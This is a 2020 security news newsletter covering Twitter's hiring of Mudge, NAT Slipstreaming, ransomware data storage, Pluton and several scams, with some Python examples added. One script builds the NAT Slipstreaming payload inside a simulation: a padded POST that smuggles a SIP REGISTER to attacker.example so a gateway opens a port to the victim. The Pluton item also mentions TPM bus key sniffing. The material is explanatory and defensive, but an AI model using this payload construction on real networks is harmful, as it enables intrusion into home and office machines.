Privacy and Security related news for the week ending 2020 11 17

Hiya DAML’ers!

How many of you think back to the days of L0phtCrack as possibly one of the first tools you used to demonstrate the concept of brute-force attacks? (Ok, maybe this says something about us.) Well, Twitter has just taken on its creator.

This week is absolutely the best collection of articles yet, as we veer from Pentagon-commissioned artwork, to numbers that give us an idea why there are so many data breaches, to a new scam involving browser notifications.

We update you on RaaS and the new DS4SD, take a trip to Pluton, look at the benefits of Glue DataBrew, and share a wonderful story about how one Bangladeshi lad is tackling cyberbullying and receiving international acclaim for it.

We end with a sad story for one person in particular and the perfect example of how not to use your vacation time.

You’re going to both love and learn with this week’s set of adventures, so let’s get going! Listen or read along.


Twitter names famed hacker ‘Mudge’ as head of security

Social media giant Twitter, under increased threat of regulation and plagued by serious security breaches, is appointing one of the world’s best-regarded hackers to tackle everything from engineering missteps to misinformation.

Twitter named Peiter Zatko, widely known by his hacker handle Mudge, to the new position of head of security, giving him a broad mandate to recommend changes in structure and practices.
Zatko answers to CEO Jack Dorsey and is expected to take over management of key security functions after a 45- to 60-day review.
Zatko most recently oversaw security at the electronic payments unicorn Stripe. Before that, he worked on special projects at Google and oversaw handing out grants for projects on cybersecurity at the Pentagon’s famed Defense Advanced Research and Projects Agency (DARPA).

Zatko’s colorful career began in the 1990s, when he simultaneously conducted classified work for a government contractor and was among the leaders of Cult of the Dead Cow, a hacking group notorious for releasing Windows hacking tools in order to goad Microsoft into improving security.

“I don’t know if anyone can fix Twitter’s security, but he’d be at the top of my list,” said Dan Kaufman, who supervised Zatko at DARPA and now leads the advanced products group at Google.


Some Apple Apps on macOS Big Sur Bypass Content Filters, VPNs

“We found out that traffic from about 50 Apple processes is excluded from being seen and controlled by NEFilterDataProvider"

Apple’s NEFilterDataProvider is used by application firewalls and VPNs to filter traffic on an app-by-app basis. Bypassing NEFilterDataProvider makes it hard for VPNs to block Apple applications. Worse, researchers say the bypass can leave systems open to attack. “Maps for example can directly access the internet bypassing any NEFilterDataProvider or NEAppProxyProviders you have running.”

The VPN and firewall bypass isn’t the only problem being reported by users of Big Sur. A MacRumors report, based on user posts in one of its forums, claims that “a large number of late 2013 and mid 2014 13-inch MacBook Pro owners” have found the upgrade bricking their machines. Similar reports were found across Reddit and Apple Support Communities, according to the report.


US: A new take in artwork from the Pentagon.

It all began when Cyber Command, the U.S. Department of Defense’s offensive cyber arm, started working with a graphics company to illustrate foreign government hackers. The military realized it could punch up the reports it releases on foreign hacking operations by adding illustrations, and try to embarrass or infuriate the foreign hacking shops.
So instead of burly, ferocious, macho bear images and names like Fancy Bear (which the hackers actually made into t-shirts to wear proudly), they commissioned images of fumbling, bumbling, endearing bears designed to drive the hackers’ management mad.

This is not the first such image. When Cyber Command wanted to highlight the lazy coding techniques in suspected Chinese government malware, the design company came up with a sloth in headphones crawling on a laptop!

This is a fairly new initiative, but it will be interesting to see what the design company comes up with for the hacking teams in Iran and North Korea.


Why all the browser updates over the last 2 weeks? Put it down to Samy Kamkar’s demo of NAT slipstreaming.

So what happens? The victim’s browser loads a page or an ad carrying a naughty piece of JavaScript (no click required). That script, running with nothing more than the browser’s ordinary privileges, sends traffic crafted so that the gateway opens a port forward back to the victim’s machine, giving the attacker a route to any TCP/UDP port on it despite the NAT (network address translation) being performed at the gateway.

It works because many NAT devices run an application-level gateway (ALG) that inspects traffic to the SIP port 5060 and creates port-forwarding rules from what it finds there. The JavaScript sends requests camouflaged as valid SIP requests, and the ALG obligingly opens whatever port they name.

So the browser makers said, “As a workaround for the ‘Slipstream’ NAT bypass attack, we will be blocking HTTP and HTTPS connections to the SIP ports 5060 and 5061.” Which means that any web application served on those two ports will now fail in the browser (not many are), and that your browser needed an update.
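To make the mechanism concrete, here is a small simulation of the NAT Slipstreaming idea and of the browser-side fix. It is an added example for this newsletter, not Samy Kamkar’s code, and it assumes a gateway whose SIP ALG takes the port to forward from the Via header and parses each TCP segment in isolation; real devices differ, and the real attack also has to discover the victim’s LAN IP and the path MSS, which the model simply takes as inputs. The HTTP POST is padded so that a segment boundary falls right before the SIP text, which is why a per-segment ALG sees a “SIP request” inside ordinary web traffic.

```python
"""Toy model of the NAT Slipstreaming mechanism and of the browser-side fix.

Added example for this newsletter; it is not Samy Kamkar's code. Assumptions:
the gateway's SIP ALG takes the port to forward from the Via header and looks
at each TCP segment in isolation, and the attacker page already knows the
victim's LAN IP and the path MSS (the real attack has to discover both).
"""
import re

SIP_PORT = 5060
MSS = 1460                          # TCP payload per segment on a plain Ethernet path (assumed)
BLOCKED_BY_BROWSER = {5060, 5061}   # the Slipstream workaround quoted above

# A SIP REGISTER only counts if it begins the segment the ALG is looking at.
SIP_REGISTER = re.compile(
    rb"\AREGISTER sip:[^\r\n]*\r\n(?:[^\r\n]*\r\n)*?"
    rb"Via: SIP/2\.0/TCP (\d+(?:\.\d+){3}):(\d+)\r\n"
)


class NaiveAlg:
    """ALG that parses every segment bound for port 5060 on its own (the flaw)."""

    def __init__(self):
        self.pinholes = {}   # external port -> (lan ip, lan port)

    def inspect(self, dst_port, lan_ip, segment):
        if dst_port != SIP_PORT:
            return None
        m = SIP_REGISTER.match(segment)
        if not m or m.group(1).decode() != lan_ip:
            return None
        port = int(m.group(2))
        self.pinholes[port] = (lan_ip, port)
        return port


class StatefulAlg(NaiveAlg):
    """ALG that only parses SIP from the first segment of a connection."""

    def __init__(self):
        super().__init__()
        self.seen_flows = set()

    def inspect(self, dst_port, lan_ip, segment, flow_id=0):
        first = flow_id not in self.seen_flows
        self.seen_flows.add(flow_id)
        return super().inspect(dst_port, lan_ip, segment) if first else None


def build_post(lan_ip, target_port, mss=MSS):
    """HTTP POST from the attacker's page, padded so the SIP text starts a segment."""
    sip = (b"REGISTER sip:attacker.example;transport=TCP SIP/2.0\r\n"
           b"Via: SIP/2.0/TCP %s:%d\r\n\r\n" % (lan_ip.encode(), target_port))
    head = b"POST / HTTP/1.1\r\nHost: attacker.example\r\n"

    def hdr(body_len):
        return head + b"Content-Length: %d\r\n\r\n" % body_len

    pad = 0
    for _ in range(3):          # converges once the Content-Length digit count settles
        pad = (-len(hdr(pad + len(sip)))) % mss
    body = b"A" * pad + sip
    assert (len(hdr(len(body))) + pad) % mss == 0   # SIP lands on a segment boundary
    return hdr(len(body)) + body


def segments(data, mss=MSS):
    """Split a byte stream the way TCP would on the wire."""
    return [data[i:i + mss] for i in range(0, len(data), mss)]


def browser_allows(port):
    """What the patched browsers do before even opening the socket."""
    return port not in BLOCKED_BY_BROWSER


def demo(lan_ip="192.168.1.20", target_port=445):
    """Run the same POST past both ALG models and the browser check."""
    segs = segments(build_post(lan_ip, target_port))
    naive, stateful = NaiveAlg(), StatefulAlg()
    for seg in segs:
        naive.inspect(SIP_PORT, lan_ip, seg)
        stateful.inspect(SIP_PORT, lan_ip, seg, flow_id=1)
    return {
        "sip_starts_a_segment": any(s.startswith(b"REGISTER") for s in segs[1:]),
        "naive_pinholes": dict(naive.pinholes),
        "stateful_pinholes": dict(stateful.pinholes),
        "browser_would_send": browser_allows(SIP_PORT),
    }


if __name__ == "__main__":
    print(demo())
```

The naive gateway opens a pinhole to the victim’s port 445, the stream-aware gateway does not, and the patched browser never sends the request in the first place; note that the browser block is a workaround, and a gateway ALG that treats every packet as the start of a conversation remains the underlying weakness.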


According to new research: Corporate Employees Have Access to an Average of 10 Million Files

“It does not come as a surprise that we continue to see the leakage/breach of personal data year-over-year.” The average employee has access to around 10.8 million files, with larger organizations having around 20 million files accessible.

Many business owners don’t restrict access to sensitive data. “They don’t because there are a few steps you need to take to ensure it is actually restricted. These steps can be daunting but they are critical to success in cyber.

  • First, you need to classify all your data and determine prioritization relative to risk.
  • You then need to ensure that identity of users is organized and limited.
  • The third, and most crucial step, is to put controls in place that limit access to and manipulation of high priority data by specific users. This does not only solve the challenge of users stealing or mishandling data, but will drive efficiency and security in several other areas."
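The three steps quoted above are easy to state and tedious to do; the following added example (not part of the cited research, with shares, groups, file counts and the need-to-know list all constructed) walks them over a tiny file-share inventory: classify each share, resolve identities through their groups, then report restricted shares that are granted to catch-all principals or reachable by anyone outside the need-to-know list. It also computes the headline metric, files reachable per employee.

```python
"""Added example: a least-privilege audit over a constructed file-share inventory.

Not part of the research quoted above; shares, groups, counts and the
need-to-know list are made up. It walks the three steps from the quote:
classify the data, organise identities, then check that restricted data is
reachable only by the named users who need it.
"""
from collections import defaultdict

# Principals that resolve to "every account in the directory".
BROAD_GROUPS = {"Everyone", "Domain Users", "Authenticated Users"}

# Step 1: classification and size of each share (constructed).
CLASSIFICATION = {
    r"\\fs1\public": "public",
    r"\\fs1\finance\payroll": "restricted",
    r"\\fs1\hr\records": "restricted",
    r"\\fs1\eng\wiki": "internal",
}
FILE_COUNTS = {
    r"\\fs1\public": 12_000,
    r"\\fs1\finance\payroll": 4_800,
    r"\\fs1\hr\records": 3_100,
    r"\\fs1\eng\wiki": 25_000,
}

# Step 2: identities organised into groups (constructed).
GROUPS = {
    "Domain Users": {"alice", "bob", "carol", "dave", "erin"},
    "Finance": {"carol"},
    "HR": {"dave"},
    "Engineering": {"alice", "bob"},
}

# ACLs as found on the shares (constructed): share -> {principal: permission}.
ACLS = {
    r"\\fs1\public": {"Everyone": "read"},
    r"\\fs1\finance\payroll": {"Finance": "modify", "Domain Users": "read"},  # over-exposed
    r"\\fs1\hr\records": {"HR": "modify"},
    r"\\fs1\eng\wiki": {"Engineering": "modify", "Authenticated Users": "read"},
}

# Step 3: who actually needs each restricted share (constructed).
NEED_TO_KNOW = {
    r"\\fs1\finance\payroll": {"carol"},
    r"\\fs1\hr\records": {"dave"},
}


def expand(principal, all_users, groups=GROUPS):
    """Resolve a principal to the set of user accounts it grants."""
    if principal in BROAD_GROUPS:
        return set(all_users)
    return set(groups.get(principal, {principal}))


def effective_access(acls=ACLS, groups=GROUPS):
    """user -> set of shares that user can reach through any ACL entry."""
    all_users = set().union(*groups.values())
    access = defaultdict(set)
    for share, entries in acls.items():
        for principal in entries:
            for user in expand(principal, all_users, groups):
                access[user].add(share)
    return access


def files_reachable_per_user(acls=ACLS, groups=GROUPS, counts=FILE_COUNTS):
    """The metric from the headline: how many files each employee can open."""
    return {user: sum(counts[s] for s in shares)
            for user, shares in effective_access(acls, groups).items()}


def audit(acls=ACLS, classification=CLASSIFICATION, need=NEED_TO_KNOW, groups=GROUPS):
    """Findings for restricted shares: broad grants, and users beyond need-to-know."""
    all_users = set().union(*groups.values())
    findings = []
    for share, entries in acls.items():
        if classification.get(share) != "restricted":
            continue
        reachable = set()
        for principal in entries:
            users = expand(principal, all_users, groups)
            if users >= all_users:
                findings.append((share, "broad-grant", principal))
            reachable |= users
        extra = reachable - need.get(share, set())
        if extra:
            findings.append((share, "beyond-need-to-know", tuple(sorted(extra))))
    return findings


if __name__ == "__main__":
    for finding in audit():
        print(*finding)
    for user, n in sorted(files_reachable_per_user().items()):
        print(f"{user}: {n:,} files reachable")
```

On a real estate the inventory would come from the file servers (for Windows shares, `Get-Acl` output or an NTFS permissions export) and the group membership from the directory; the logic stays the same, and the “broad-grant” findings are the quick wins.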

Watch what sites you allow to provide notifications.

Several dodgy firms are paying site owners to install their notification scripts and then selling that communications pathway to scammers.

Many users may not fully grasp what they are consenting to when they approve notifications, or how to tell the difference between a notification sent by a website and one made to appear like an alert from the operating system or another program that’s already installed on the device.

This is evident from the apparent scale of the infrastructure behind a relatively new company based in Montenegro called PushWelcome, which advertises the ability for site owners to monetize traffic from their visitors. The company’s site currently is ranked by Alexa.com as among the top 2,000 sites in terms of Internet traffic globally.

Website publishers who sign up with PushWelcome are asked to include a small script on their page which prompts visitors to approve notifications.

Approving notifications from a site that uses PushWelcome allows any of the company’s advertising partners to display whatever messages they choose, whenever they wish to, and in real time. And almost invariably, those messages include misleading notifications about security risks on the user’s system, prompts to install other software, ads for dating sites, erectile dysfunction medications, and dubious investment opportunities.


If you would like to stop push notifications, the Verge provided a good overview in an article from 2019.
https://www.theverge.com/2019/7/18/18716041/website-notification-prompts-pop-ups-how-to-stop#:~:text=Click%20the%20three-line%20menu,requests%20asking%20to%20allow%20notifications.
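Clicking through the browser settings works for one machine; for a fleet, or just to see at a glance which sites you have let in, it helps to read the permission list directly. The script below is an added example, not from the Krebs article: it lists the sites allowed to push notifications in a Chromium-style Preferences file and flips everything not on an allowlist to “block”. The JSON layout it reads (profile.content_settings.exceptions.notifications, keyed by an origin pattern, with setting 1 meaning allow and 2 meaning block) is an assumption about Chromium’s format, and SAMPLE_PREFS is constructed.

```python
"""Added example: list and revoke per-site notification permissions in a
Chromium-style Preferences file.

Not from the Krebs piece. The JSON layout (profile.content_settings.
exceptions.notifications, keyed by 'origin-pattern,*', with setting 1 = allow
and 2 = block) is an assumption about Chromium's format, and SAMPLE_PREFS is
constructed. Run it only with the browser closed, or it will overwrite the edit.
"""
import json

ALLOW, BLOCK = 1, 2

SAMPLE_PREFS = json.loads("""{
  "profile": {"content_settings": {"exceptions": {"notifications": {
    "https://mail.example.com:443,*":       {"last_modified": "13250000000000000", "setting": 1},
    "https://news-push.example.net:443,*":  {"last_modified": "13250000000000001", "setting": 1},
    "http://free-movies.example.org:80,*":  {"last_modified": "13250000000000002", "setting": 1},
    "https://blocked.example.com:443,*":    {"last_modified": "13250000000000003", "setting": 2}
  }}}}
}""")


def notification_entries(prefs):
    """The dict of per-site notification exceptions, or {} if there are none."""
    return (prefs.get("profile", {}).get("content_settings", {})
                 .get("exceptions", {}).get("notifications", {}))


def origin_host(pattern):
    """'https://host:443,*' -> 'host'. Patterns are 'primary,secondary'."""
    primary = pattern.split(",", 1)[0]
    host_port = primary.split("://", 1)[-1]
    return host_port.rsplit(":", 1)[0]


def allowed_hosts(prefs):
    """Sites currently permitted to push notifications, sorted by host."""
    return sorted(origin_host(p) for p, e in notification_entries(prefs).items()
                  if e.get("setting") == ALLOW)


def revoke_except(prefs, keep):
    """Flip every allowed site not in `keep` to BLOCK in place; return what was revoked."""
    revoked = []
    for pattern, entry in notification_entries(prefs).items():
        host = origin_host(pattern)
        if entry.get("setting") == ALLOW and host not in keep:
            entry["setting"] = BLOCK
            revoked.append(host)
    return sorted(revoked)


def revoke_in_file(path, keep):
    """Apply revoke_except to a Preferences file on disk (browser must be closed)."""
    with open(path, encoding="utf-8") as f:
        prefs = json.load(f)
    revoked = revoke_except(prefs, keep)
    with open(path, "w", encoding="utf-8") as f:
        json.dump(prefs, f, separators=(",", ":"))
    return revoked


if __name__ == "__main__":
    print("allowed:", allowed_hosts(SAMPLE_PREFS))
    print("revoked:", revoke_except(SAMPLE_PREFS, keep={"mail.example.com"}))
    print("allowed now:", allowed_hosts(SAMPLE_PREFS))
```

The Preferences file normally lives under the profile directory (for Google Chrome on Windows that is typically %LOCALAPPDATA%\Google\Chrome\User Data\Default\Preferences, on Linux ~/.config/google-chrome/Default/Preferences); take a backup before writing, and expect the browser to rewrite the file if it is running while you edit.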


RU: Ransomware Operator Promotes Distributed Storage for Stolen Data (DS4SD)

News last week about a ransomware-as-a-service (RaaS) operation called DarkSide setting up a distributed storage system in Iran for storing data stolen from victims of its attacks could mean big trouble for organizations.

If the model proves successful, other ransomware operators are likely to implement similar systems, making it even harder for defenders to prevent crooks from leaking sensitive corporate data stolen in ransomware attacks.

The first advertisement on Nov. 11 proclaimed plans by the DarkSide group to create a distributed storage system that customers (or so-called affiliates) of its ransomware services could use to store data stolen from victims. “We are already working on a sustainable storage system for your data,” the advertisement noted. “All your data will be replicated between multiple servers, blocking one server won’t delete data.” The advertisement guaranteed affiliates that stolen data would be stored for a minimum of six months.

In this context, affiliates are criminal groups that use a RaaS offering such as DarkSide to target organizations, launch attacks, and extract money from victims. As developers of the service, operators like DarkSide get to keep a substantial cut of the ransom.


Microsoft Unveils ‘Pluton’ Security Processor for PCs

Microsoft has unveiled Pluton, a new security chip for Windows PCs that the tech giant will deliver through partnerships with Intel, AMD and Qualcomm.

PCs currently use the Trusted Platform Module (TPM) to store encryption keys and the data needed to ensure the integrity of the system, but that data is still exposed to attack while it passes over the communication channel between a discrete TPM and the CPU, particularly if the attacker has physical access to the targeted system. This is the class of attack in which, for example, a BitLocker volume key is sniffed off the LPC or SPI bus as the TPM releases it at boot; the usual mitigation on today’s hardware is to require a PIN or startup key so that the TPM will not unseal the key without the user present.

Pluton aims to address this by storing encryption keys and other sensitive data within the processor, thus eliminating the exposure of that communication channel and providing protection against speculative execution and other types of attacks.


Updating Google Photos’ storage policy to build for the future

Build user dependency. Check. Put competition out of business. Check. Google Photos is ending its unlimited free storage policy for photos and videos, Google said in a Wednesday blog post. After June 1, 2021, any new photos and videos you upload will count toward the free 15GB of storage that comes with every Google account.

This comes as the tightening of data privacy laws most probably means that Google has less scope to monetize the data from your photos, but it could also tie into the often-quoted claim that each year we take and store more photos than were taken in the entire history of the world prior to the start of that year.


Teen Wins Peace Prize for Fighting Cyber-Bullying

Sadat Rahman is a 17-year-old from Bangladesh. A story about a 15-year-old girl who took her own life after being cyberbullied moved him so much that he founded his own organization and created the anti-cyberbullying app ‘Cyber Teens’ to give helpless teenagers a place to go for help. One of the major issues around cyberbullying is that young people are afraid to report it to the police or to tell their parents. The app gives young people information about internet safety and lets them report cyberbullying.

Rahman’s Cyber Teens app has been downloaded over 1,800 times and has supported 300 young victims of cyber-bullying.

Rahman’s win came with $118,000 in prize money that he intends to use to roll out the app across Bangladesh and to other countries.


Glue DataBrew: Interesting new service to clean data.

AWS Glue DataBrew is a new visual data preparation tool for data analysts and data scientists to clean and normalize data to prepare it for analytics and machine learning. You can choose from over 250 pre-built transformations to automate data preparation tasks such as filtering anomalies, converting data to standard formats and correcting invalid values. After your data is ready, you can use it for analytics.
We think it could be a great way to remove sensitive information from data collections or even to verify the content of what you are pulling in.


Mississippi Program to Use Door Cameras to Fight Crime

Jackson, Miss., began a pilot program with two technology corporations to provide a platform for the police department to access private surveillance via residents’ Ring cameras.

“Ultimately, what will happen is residents and businesses will be able to sign a waiver, if they want their camera to be accessed from the Real Time Crime Center. It would save (us) from having to buy a camera for every place across the city.”

“We’ll be able to get a location, draw a circle around it and pull up every camera within a certain radius to see if someone runs out of a building. We can follow and trace them.”

The equipment needed to allow the center access to cameras is being provided by corporations Pileum and Fusus: Pileum, an information and technology consulting company founded in 2002, is based in Jackson, according to its website. Fusus, a Georgia-based company, provides cloud services to allow real-time crime centers to extract video information.

Why does this idea scare us so much?



Hacked Security Software Used in South Korean Supply-Chain Attack

In this attack the Lazarus Group, notorious for its 2014 Sony Pictures Entertainment hack, abuses security software made by Wizvera. The software, called Wizvera VeraPort, is used by South Korean government websites, which require visitors to use a VeraPort browser plug-in for identity verification.

“To understand this novel supply-chain attack, you should be aware that South Korean internet users are often asked to install additional security software when visiting government or internet banking websites.”

Once attackers achieve a foothold on a targeted server, malicious binaries that appear to be legitimate and use the stolen digital certificates are planted on a compromised website and pushed automatically to unsuspecting site visitors.

The next stage delivers the Lazarus remote access trojan. Its commands include operations on the victim’s filesystem and downloading additional tools from the attacker’s arsenal, researchers wrote.


Exposed Database Reveals 100K+ Compromised Facebook Accounts

The unsecured Elasticsearch database was 5.5 gigabytes and contained 13,521,774 records of at least 100,000 Facebook users. It was open between June and September of this year; it was discovered on Sept. 21 and closed on Sept. 22.

The data in the exposed database included credentials and IP addresses; text outlines for comments the fraudsters would make on Facebook pages (via a hacked account) that directed people to suspicious and fraudulent websites; and personally identifiable information (PII) data such as emails, names and phone numbers of the Bitcoin scam victims.

The global scam targeting Facebook users starts with a network of websites owned by fraudsters, which trick Facebook users into providing their credentials by promising they would show targets a list of people who had recently visited their profiles.

The website tells victims “There were 32 profile visitors on your page in the last 2 days! Continue to view your list,” and points them to a button that says “Open List!” When the victim clicks on the button, they are sent to a fake Facebook login page, where they are asked to input their login credentials.


US gov’s CISO takes leave to help Trump search for election fraud

The US government’s chief information security officer (CISO) is taking time off from his official duties to help in President Trump’s search for election fraud.

Camilo Sandoval worked on Trump’s 2016 campaign and has been the federal CISO, a position in the White House’s Office of Management and Budget, since October of this year. But Sandoval is now spending his days working for the newly formed Voter Integrity Fund, which is reportedly “run by government employees and former Trump campaign staffers who are analyzing voter data in six key states,” and which will, according to a Trump tweet, find evidence that “Radical Left Democrats” are partnering with “the Fake News Media” to “STEAL this Election.”

In an interview on Friday, Sandoval defended his involvement in the endeavor as appropriate, saying he had taken vacation time from his government position, which he started last month. He said he was not using any government resources, such as his work computer or cellphone, while searching for fraud.

Just what anyone would like to do on their vacation time off.


Stay safe, stay secure, and see you next week!